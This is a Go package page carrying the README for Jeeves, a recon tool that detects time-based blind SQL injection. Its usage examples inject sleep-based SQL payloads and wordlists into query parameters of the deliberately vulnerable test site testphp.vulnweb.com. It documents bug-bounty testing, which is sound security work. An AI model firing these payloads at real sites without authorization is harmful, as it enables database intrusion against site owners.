Jeeves

command module
v0.0.0-...-eed53a5 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Apr 27, 2022 License: MIT Imports: 12 Imported by: 0

README

Jeeves


UsageInstallation

Jeeves is made for looking to Time-Based Blind SQLInjection through recon.

- Installation & Requirements:

> go install github.com/ferreiraklet/Jeeves@latest

OR

> git clone https://github.com/ferreiraklet/Jeeves.git

> cd Jeeves

> go build jeeves.go

> chmod +x jeeves

> ./jeeves -h

- Usage & Explanation:

  • In Your recon process, you may find endpoints that can be vulnerable to sql injection,


    Jeeves reads from stdin:

    echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves --payload-time time_payload

    In --payload-time you must use the time mentioned in payload.


    You can use a file containing a list of targets as well:

    cat targets | jeeves --payload-time 5


  • You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght

    • Another examples of usage:

       Usage:
 --payload-time,      The time from payload
 --proxy              Send traffic to a proxy
 -c                   Set Concurrency
 -H, --headers        Custom Headers
 -h                   Show This Help Message

    Ex 1 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5


    Ex 2 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves --payload-time 10


    Ex 3 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port"


    Ex 4 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"


    You can specify more than one header, OBS: Be careful, the syntax must be exact the same, Ex:

    Ex 5 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

    TIP:

    Using with sql payloads wordlist cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves --payload-time 5;done

    OBS:

    • Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys"
    • Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )

This project is for educational and bug bounty porposes only! I do not support any illegal activities!.

If any error in the program, talk to me immediatly.

Documentation

The Go Gopher

There is no documentation for this package.

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.